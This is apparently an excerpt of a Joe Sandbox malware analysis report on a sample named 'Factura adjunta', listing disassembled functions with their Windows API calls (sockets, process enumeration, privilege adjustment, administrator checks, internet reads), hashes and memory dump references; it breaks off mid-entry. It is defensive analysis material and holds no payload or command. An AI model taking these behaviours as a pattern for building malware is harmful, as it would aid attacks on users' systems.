                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: ErrorLast$bindclosesocketinet_addrsocket
                            • String ID:
                            • API String ID: 99427753-0
                            • Opcode ID: 1a6b4bd517b99d6892b09402f5141d6fe1a79c63fc363f9e21cbf25e05697c87
                            • Instruction ID: b8d52cbfac1607245a62a880d20e585a768444d4794904bccb7cf72bce0ef228
                            • Opcode Fuzzy Hash: 1a6b4bd517b99d6892b09402f5141d6fe1a79c63fc363f9e21cbf25e05697c87
                            • Instruction Fuzzy Hash: 9F41A575B00214EFEB10AF24DC8AFAE77A9EF44710F448458FB16EB2D2DA749D008791
                            Function 008355FD Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                            • String ID:
                            • API String ID: 292994002-0
                            • Opcode ID: 9eadcb3c884ef660c09b6520e7ac8216d4affdf3b65ef2c92641e3dfec2f4c76
                            • Instruction ID: 7d86a5cf82e45b98684c0bebad041921753781c7c795dff6073b5bc8d7c6dceb
                            • Opcode Fuzzy Hash: 9eadcb3c884ef660c09b6520e7ac8216d4affdf3b65ef2c92641e3dfec2f4c76
                            • Instruction Fuzzy Hash: 7311B231700911AFE7212F26DC4AB6B7798FFE4721F804429F946D7241EB749901CAE5
                            Function 0082F121 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                            Download Yara Rule
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32 ref: 0082F151
                            • Process32FirstW.KERNEL32(00000000,?), ref: 0082F15F
                              • Part of subcall function 007B7F41: _memmove.LIBCMT ref: 007B7F82
                            • Process32NextW.KERNEL32(00000000,?), ref: 0082F21F
                            • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0082F22E
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                            • String ID:
                            • API String ID: 2576544623-0
                            • Opcode ID: 529e57f309c69d27239d11c524df5e2e8ed49b367d03ff2be96b48fc5569967f
                            • Instruction ID: 73e7b35ac97dafc5e98c83a1de8cff9a1d563ce1f69e231136f2727b6de6605e
                            • Opcode Fuzzy Hash: 529e57f309c69d27239d11c524df5e2e8ed49b367d03ff2be96b48fc5569967f
                            • Instruction Fuzzy Hash: A4514A71504310DBD310EF24D885BABBBE8FF94710F50492DF695D72A2EB74A948CB92
                            Function 008140B1 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 008140D1
                            • _memset.LIBCMT ref: 008140F2
                            • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00814144
                            • CloseHandle.KERNEL32(00000000), ref: 0081414D
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: CloseControlCreateDeviceFileHandle_memset
                            • String ID:
                            • API String ID: 1157408455-0
                            • Opcode ID: c5cb64275d856f26ac98517023f15e8e3b6bc038b8a16fc799e653cf2874cd5a
                            • Instruction ID: 827780db264f27dcafb1d19d3b1c3852355076faa1edfc9792a656425692b5d0
                            • Opcode Fuzzy Hash: c5cb64275d856f26ac98517023f15e8e3b6bc038b8a16fc799e653cf2874cd5a
                            • Instruction Fuzzy Hash: 0111AB75D01228BAD7305BA5AC4DFEBBB7CEF84760F104596F908D7180D6744E848BA4
                            Function 007B1290 Relevance: 6.1, APIs: 4, Instructions: 59nativeCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 007B2612: GetWindowLongW.USER32(?,000000EB), ref: 007B2623
                            • NtdllDialogWndProc_W.NTDLL(?,00000020,?), ref: 007B12D8
                            • GetClientRect.USER32(?,?), ref: 007EB84B
                            • GetCursorPos.USER32(?), ref: 007EB855
                            • ScreenToClient.USER32(?,?), ref: 007EB860
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Client$CursorDialogLongNtdllProc_RectScreenWindow
                            • String ID:
                            • API String ID: 1010295502-0
                            • Opcode ID: 6e2b0f1fd0bbe07abe1c62d918cc6e54b1d95b034082a5d2524afd33bb9f0e46
                            • Instruction ID: 7c72aa1bf7cbf4d3f9397875792d50b4ee19e7bed9bbb6cb95d4c1bf0ea0661d
                            • Opcode Fuzzy Hash: 6e2b0f1fd0bbe07abe1c62d918cc6e54b1d95b034082a5d2524afd33bb9f0e46
                            • Instruction Fuzzy Hash: 1D115836A01019EFCB04EF98D899AFE77B8FB45301F804866FA11E3251D734AA51CBA5
                            Function 007B16DE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83nativeCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 007B2612: GetWindowLongW.USER32(?,000000EB), ref: 007B2623
                              • Part of subcall function 007B25DB: GetWindowLongW.USER32(?,000000EB), ref: 007B25EC
                            • GetParent.USER32(?), ref: 007EBA0A
                            • NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?,?,?,?,?,007B19B3,?,?,?,00000006,?), ref: 007EBA84
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: LongWindow$DialogNtdllParentProc_
                            • String ID: h)
                            • API String ID: 314495775-3328819710
                            • Opcode ID: 7353e256fa9977daaa75a44fdd1cb4d1818e00db7545dfc40076d944eedd3a67
                            • Instruction ID: 18d3c641bf55e87763e43bb4e26126287941e61fad3913af5b29fdf7ff1a45c1
                            • Opcode Fuzzy Hash: 7353e256fa9977daaa75a44fdd1cb4d1818e00db7545dfc40076d944eedd3a67
                            • Instruction Fuzzy Hash: AC21F834201144AFCF248F28C898FE93BD2EF09364F988260F5299B2F2DB349D52DB50
                            Function 0083C86D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46nativewindowCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 007B2612: GetWindowLongW.USER32(?,000000EB), ref: 007B2623
                            • NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,007EBB8A,?,?,?), ref: 0083C8E1
                              • Part of subcall function 007B25DB: GetWindowLongW.USER32(?,000000EB), ref: 007B25EC
                            • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 0083C8C7
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: LongWindow$DialogMessageNtdllProc_Send
                            • String ID: h)
                            • API String ID: 1273190321-3328819710
                            • Opcode ID: 37dc75152b92620425883370120894e7bd54d4127e2a759344f6449010b7fa97
                            • Instruction ID: eaa34f21e1c8a2bd98e7b3ec5c62b1b2b3dcd57fc80d02bdb83ed64be48f8d29
                            • Opcode Fuzzy Hash: 37dc75152b92620425883370120894e7bd54d4127e2a759344f6449010b7fa97
                            • Instruction Fuzzy Hash: 1501D431200204ABCB215F14CC48F6A7BA6FFC5365F144538F9559B2E1CB71A852EBD1
                            Function 008225E2 Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                            Download Yara Rule
                            APIs
                            • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 008226D5
                            • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 0082270C
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Internet$AvailableDataFileQueryRead
                            • String ID:
                            • API String ID: 599397726-0
                            • Opcode ID: c81f6ae4112f52c6a3aaa8b40d5f7695f7ab409fec9ba233c803a0f8ad7f80fc
                            • Instruction ID: 8f63fd3be1215282171c9ff62e7301067e7359536492717c8edba4d32545aec4
                            • Opcode Fuzzy Hash: c81f6ae4112f52c6a3aaa8b40d5f7695f7ab409fec9ba233c803a0f8ad7f80fc
                            • Instruction Fuzzy Hash: 3341C772904219FFEB20DE94EC85EBBB7BCFB50728F10406AF605E6241EA719EC19754
                            Function 0081B59E Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                            Download Yara Rule
                            APIs
                            • SetErrorMode.KERNEL32(00000001), ref: 0081B5AE
                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0081B608
                            • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0081B655
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: ErrorMode$DiskFreeSpace
                            • String ID:
                            • API String ID: 1682464887-0
                            • Opcode ID: 164ceec1be848ec913d9e515b737bf41f4a229c9a47b4a8052761afd9bb8c29a
                            • Instruction ID: 09e66c54cac45107f5684254fa1bbc2ea5dbdccca32298aea002b479f0d57ffb
                            • Opcode Fuzzy Hash: 164ceec1be848ec913d9e515b737bf41f4a229c9a47b4a8052761afd9bb8c29a
                            • Instruction Fuzzy Hash: 53214175A00518EFCB00EFA5D884EEDBBB8FF89314F1480A9E905EB361DB31A955CB51
                            Function 00808CC3 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 007D0FF6: std::exception::exception.LIBCMT ref: 007D102C
                              • Part of subcall function 007D0FF6: __CxxThrowException@8.LIBCMT ref: 007D1041
                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00808D0D
                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00808D3A
                            • GetLastError.KERNEL32 ref: 00808D47
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                            • String ID:
                            • API String ID: 1922334811-0
                            • Opcode ID: 52ad3995fc854be76b56db9dd6ce6efe5db1290691feafe62475a52dc1b86320
                            • Instruction ID: 712e36d1fc5f9abcfc8ff8e2da2c89c362911ed7893b3a9e21d034d263e4f332
                            • Opcode Fuzzy Hash: 52ad3995fc854be76b56db9dd6ce6efe5db1290691feafe62475a52dc1b86320
                            • Instruction Fuzzy Hash: 741194B1914209EFE728EF54EC85D6BB7BCFB44710B20852EF89593251DF30AC408A60
                            Function 00814C03 Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                            Download Yara Rule
                            APIs
                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00814C2C
                            • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00814C43
                            • FreeSid.ADVAPI32(?), ref: 00814C53
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: AllocateCheckFreeInitializeMembershipToken
                            • String ID:
                            • API String ID: 3429775523-0
                            • Opcode ID: a56cf165df82949b969c3ffe93aa55f1206796951aff6866b8382aa09fa1afb1
                            • Instruction ID: 3158c2f5573354c4cd82c0a91fe3c5fde667ff7d1d98e471bf60ff4edfaf3c0f
                            • Opcode Fuzzy Hash: a56cf165df82949b969c3ffe93aa55f1206796951aff6866b8382aa09fa1afb1
                            • Instruction Fuzzy Hash: 77F03C75E1120CBBDB04DFE49D99AADB7BCFF08201F004869A605E2182D7745A448B90
                            Function 0083D6C6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47nativeCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 007B25DB: GetWindowLongW.USER32(?,000000EB), ref: 007B25EC
                            • NtdllDialogWndProc_W.NTDLL(?,00000115,?,?,?,?,?,?,007EBBA2,?,?,?,?,00000000,?), ref: 0083D740
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: DialogLongNtdllProc_Window
                            • String ID: h)
                            • API String ID: 2065330234-3328819710
                            • Opcode ID: dcb9d71b533e780dad090dd914c730ffbc996ebb2ad237890e3021ad5eec9c91
                            • Instruction ID: bf93edcb09d3022ce52b5fef1c07af05666677b828c92dfd286ad2207ce52c73
                            • Opcode Fuzzy Hash: dcb9d71b533e780dad090dd914c730ffbc996ebb2ad237890e3021ad5eec9c91
                            • Instruction Fuzzy Hash: 54012835600214AFDF148F29E889EF93BA1FFC1325F084125F95A9B192C330AC61D7E0
                            Function 007BE060 Relevance: 3.5, APIs: 2, Instructions: 539COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2ff1fd80a64a793615a611e7e67ea44e08f4c22e693509fbb440694a79894bbd
                            • Instruction ID: c067e0f5abf19c2ac4597aa08b07a1b12fe5dc4c439f9813c9fc45297beb0692
                            • Opcode Fuzzy Hash: 2ff1fd80a64a793615a611e7e67ea44e08f4c22e693509fbb440694a79894bbd
                            • Instruction Fuzzy Hash: 89227B74A00219DFDB24DF58C494BFABBF0FF08310F248569E956AB351E738A985CB91
                            Function 0081C93C Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                            Download Yara Rule
                            APIs
                            • FindFirstFileW.KERNEL32(?,?), ref: 0081C966
                            • FindClose.KERNEL32(00000000), ref: 0081C996
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Find$CloseFileFirst
                            • String ID:
                            • API String ID: 2295610775-0
                            • Opcode ID: 6b16ddfa82bb9c95a1898a6e29224a5c44de1923e5dc78697ca3c01aa5c89287
                            • Instruction ID: fa0868f27989456ef52c2ab3624cc007021e2bd645a12e3b31be3d041551fb0a
                            • Opcode Fuzzy Hash: 6b16ddfa82bb9c95a1898a6e29224a5c44de1923e5dc78697ca3c01aa5c89287
                            • Instruction Fuzzy Hash: 8D1165726106149FD710EF29D849A6AF7E9FF85324F00891EF9A5D7291DB34AC00CB81
                            Function 0083CC2E Relevance: 3.0, APIs: 2, Instructions: 33nativeCOMMON
                            Download Yara Rule
                            APIs
                            • ClientToScreen.USER32(?,?), ref: 0083CC51
                            • NtdllDialogWndProc_W.NTDLL(?,00000200,?,?,?,?,?,?,?,007EBC66,?,?,?,?,?), ref: 0083CC7A
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: ClientDialogNtdllProc_Screen
                            • String ID:
                            • API String ID: 3420055661-0
                            • Opcode ID: dc6ad514e94088b2bb096199ad09ba1072d2e2744c1638dd5e16af43da16ed60
                            • Instruction ID: 48e685e3500cc25fbe6b3921eca2e7440f7e83f8db8a32d90b8807d4133019df
                            • Opcode Fuzzy Hash: dc6ad514e94088b2bb096199ad09ba1072d2e2744c1638dd5e16af43da16ed60
                            • Instruction Fuzzy Hash: 1CF0307280011CFFDF048F45DD49DAE7BB9FB48311F04456AF915A2161D3716A60DBA4
                            Function 0081A2D5 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                            Download Yara Rule
                            APIs
                            • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0082977D,?,0083FB84,?), ref: 0081A302
                            • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0082977D,?,0083FB84,?), ref: 0081A314
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: ErrorFormatLastMessage
                            • String ID:
                            • API String ID: 3479602957-0
                            • Opcode ID: 5fb27ac7dcf69bd0cb72d34b3e15b2c6fa4d9d7a3a292c663c9263412708203d
